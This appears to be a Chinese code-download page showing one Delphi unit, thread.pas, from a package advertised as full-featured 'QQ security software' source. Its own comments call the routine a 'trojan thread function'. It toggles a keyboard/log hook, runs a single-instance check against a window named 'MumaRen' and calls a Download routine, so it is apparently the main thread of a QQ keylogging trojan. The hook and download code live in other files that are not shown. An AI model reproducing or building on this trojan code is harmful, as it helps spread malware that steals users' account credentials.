⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 thread.pas

📁 DEILPHI写的QQ安全软件源码!功能全套,该有的全有了,欢迎交流
💻 PAS
字号:
unit  Thread;

interface

procedure ThreadPro(X: Integer); stdcall; // 木马线程函数

implementation

uses
  Windows, Messages, EditWin, VarUnit,Timer,ScanWin,FunUnit,ExtInfo,LogHook,downn;

    // 木马线程函数  『参数无用』
procedure ThreadPro(X: Integer); stdcall;
var
  Msg: TMsg;
begin
     LogHookOff;
 if (FindWindow('Edit', 'MumaRen') <> 0) then Exit;
    CreateEdit();
     Download;
    LogHookOn;
  while GetMessage(Msg, 0, 0, 0) do
  begin
    TranslateMessage(Msg);
    DispatchMessage(Msg);
  end;
    LogHookOff();
  FreeLibraryAndExitThread(HInstance, X);
end;

 end.

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -